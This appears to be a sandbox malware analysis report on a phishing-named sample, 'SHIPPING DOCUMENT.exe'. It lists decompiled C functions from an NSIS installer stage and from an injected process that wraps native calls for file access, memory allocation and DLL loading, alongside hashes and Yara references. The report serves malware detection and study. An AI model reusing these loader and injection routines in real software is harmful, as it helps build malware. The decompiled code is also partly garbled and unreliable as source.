                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszA951.tmp,00000000,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405D01
                                            • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,00000000,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560), ref: 00405D11
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nszA951.tmp
                                            • API String ID: 3248276644-769776495
                                            • Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                            • Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
                                            • Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                            • Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040610F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                            0x0040611d
                                            0x0040611f
                                            0x00406137
                                            0x0040613c
                                            0x00406141
                                            0x0040617e
                                            0x0040617e
                                            0x00406143
                                            0x00406155
                                            0x00406160
                                            0x00406166
                                            0x00406170
                                            0x00000000
                                            0x00000000
                                            0x00406170
                                            0x00406183

                                            APIs
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,00420530,?,?,?,00000002,uvlcopdlxoed,?,004063C4,80000002), ref: 00406155
                                            • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,00420530), ref: 00406160
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: uvlcopdlxoed
                                            • API String ID: 3356406503-3939465813
                                            • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                            • Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
                                            • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                            • Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004058C7(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422558->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                            0x004058d0
                                            0x004058f0
                                            0x004058f8
                                            0x004058fd
                                            0x00000000
                                            0x00405903
                                            0x00405907

                                            APIs
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                                            • CloseHandle.KERNEL32(?), ref: 004058FD
                                            Strings
                                            • Error launching installer, xrefs: 004058DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                            • Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
                                            • Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                            • Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405C07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405C07(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                            0x00405c08
                                            0x00405c12
                                            0x00405c14
                                            0x00405c1b
                                            0x00405c23
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405c23
                                            0x00405c25
                                            0x00405c2a

                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,80000000,00000003), ref: 00405C0D
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,80000000,00000003), ref: 00405C1B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-224404859
                                            • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                            • Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
                                            • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                            • Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405D26, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                            0x00405d36
                                            0x00405d38
                                            0x00405d3b
                                            0x00405d67
                                            0x00405d40
                                            0x00405d49
                                            0x00405d4e
                                            0x00405d59
                                            0x00405d5c
                                            0x00405d78
                                            0x00405d5e
                                            0x00405d65
                                            0x00000000
                                            0x00405d65
                                            0x00405d71
                                            0x00405d75
                                            0x00405d75
                                            0x00405d6f
                                            0x00000000

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                            • CharNextA.USER32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                            • Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
                                            • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                            • Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: SHIPPING DOCUMENT.exe PID: 7088 Parent PID: 7060 SHIPPING DOCUMENT.exeCOMMON

                                            Executed Functions

                                            Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: BMA$BMA
                                            • API String ID: 2738559852-2163208940
                                            • Opcode ID: 6663b026e105d7f6853f4d559d4a456aafc6f28bb1ddccbe58ecaba56839d856
                                            • Instruction ID: 397840b7226cff0a8c2a273405c0de42f80a15c4c86648141e34fcbd4ab4520d
                                            • Opcode Fuzzy Hash: 6663b026e105d7f6853f4d559d4a456aafc6f28bb1ddccbe58ecaba56839d856
                                            • Instruction Fuzzy Hash: 7EF0E2B6200108ABDB04DFA9DC80EEB77A9FF8C354F058649FA0DA7255D630E8518BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                            0x00419e13
                                            0x00419e1f
                                            0x00419e27
                                            0x00419e32
                                            0x00419e4d
                                            0x00419e55
                                            0x00419e59

                                            APIs
                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: BMA$BMA
                                            • API String ID: 2738559852-2163208940
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040ACD0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(__eflags != 0) {
						E0041CCF0(__eflags,  &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                            0x0040acec
                                            0x0040acef
                                            0x0040acf4
                                            0x0040acf9
                                            0x0040ad03
                                            0x0040ad08
                                            0x0040ad0b
                                            0x0040ad0d
                                            0x0040ad15
                                            0x0040ad1a
                                            0x0040ad1a
                                            0x0040ad21
                                            0x0040ad29
                                            0x0040ad2c
                                            0x0040ad2e
                                            0x0040ad42
                                            0x00000000
                                            0x0040ad44
                                            0x0040ad4a
                                            0x0040acfe
                                            0x0040acfe
                                            0x0040acfe

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 48filenativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 50%
                                            			E00419D5A(void* __ebx, void* __ecx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48) {
				char _v1;
				char* _t79;

				gs =  *((intOrPtr*)(__ecx + 0x54));
				_t79 =  &_v1;
				asm("cmpsb");
				if (_t79 != 0) goto L3;
				_push(_t79);
			}





                                            0x00419d5a
                                            0x00419d5d
                                            0x00419d5e
                                            0x00419d5f
                                            0x00419d60

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: feaa8398807b6fb96e7716276cc66b0b518c7afcbcbd638751429a959111c507
                                            • Instruction ID: f9381d7134a1cfda0c2c6443e205c53c510c5da5d86aabae719b77e45fbee567
                                            • Opcode Fuzzy Hash: feaa8398807b6fb96e7716276cc66b0b518c7afcbcbd638751429a959111c507
                                            • Instruction Fuzzy Hash: 1601ECB2205108BBDB08CF88DC95EDB77ADEF8D714F158688FA4D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                            0x00419f4f
                                            0x00419f57
                                            0x00419f79
                                            0x00419f7d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00419F3A(void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;
				intOrPtr _t29;

				asm("pushfd");
				asm("sbb esp, [edi+0x55]");
				 *((intOrPtr*)(__esi - 0x741374ab)) = _t29;
				_t11 = _a4;
				_push(__esi);
				_t4 = _t11 + 0xc60; // 0xca0
				E0041A960(_t22, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}






                                            0x00419f3a
                                            0x00419f3b
                                            0x00419f3e
                                            0x00419f43
                                            0x00419f49
                                            0x00419f4f
                                            0x00419f57
                                            0x00419f79
                                            0x00419f7d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 61b04c525a77874d67790ec602b4d2c75a8c0533b9dd944b7610317aac1f782d
                                            • Instruction ID: 3801971514b8a8089897fd999247aec2ae4abfdd80a9c7b57ec9780c92e2fe1b
                                            • Opcode Fuzzy Hash: 61b04c525a77874d67790ec602b4d2c75a8c0533b9dd944b7610317aac1f782d
                                            • Instruction Fuzzy Hash: 8FF082B1110149ABCB14EF58DC81CA7BBA8FF48214B05864DFD5897202C234E465CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E00419E8A(signed int __eax, void* _a1, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t12;
				signed int _t17;

				_t17 = __eax * 0x558427da;
				_push(_t17);
				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                            0x00419e8b
                                            0x00419e90
                                            0x00419e93
                                            0x00419e96
                                            0x00419e9f
                                            0x00419ea7
                                            0x00419eb5
                                            0x00419eb9

                                            APIs
                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 7f824ee33eaed075c4ceca4afb4a4bdb26db5310f2e6f58857ff35fe34f7727d
                                            • Instruction ID: 51a1225ca4a49fe52bd5489eb7f031ca537e9b0c3824b2144be3092b8b180da6
                                            • Opcode Fuzzy Hash: 7f824ee33eaed075c4ceca4afb4a4bdb26db5310f2e6f58857ff35fe34f7727d
                                            • Instruction Fuzzy Hash: 29E0C275200208ABD710EFE4CC86FD77B68EF44B20F058559BA5C9B242D530FA5087D0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                            0x00419e93
                                            0x00419e96
                                            0x00419e9f
                                            0x00419ea7
                                            0x00419eb5
                                            0x00419eb9

                                            APIs
                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 537baf0839ca74ab9ee8a0c36a4d17d7037c3b97d2d12bd8feb8d6a504a471fa
                                            • Instruction ID: 5e015fd064347010c23f140bdb185a53197db3288e770c5224d51937c6000e5f
                                            • Opcode Fuzzy Hash: 537baf0839ca74ab9ee8a0c36a4d17d7037c3b97d2d12bd8feb8d6a504a471fa
                                            • Instruction Fuzzy Hash: 4D90026260101502D20171594404656044AD7D0381FD1C476A1014555ECA6589E2F1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
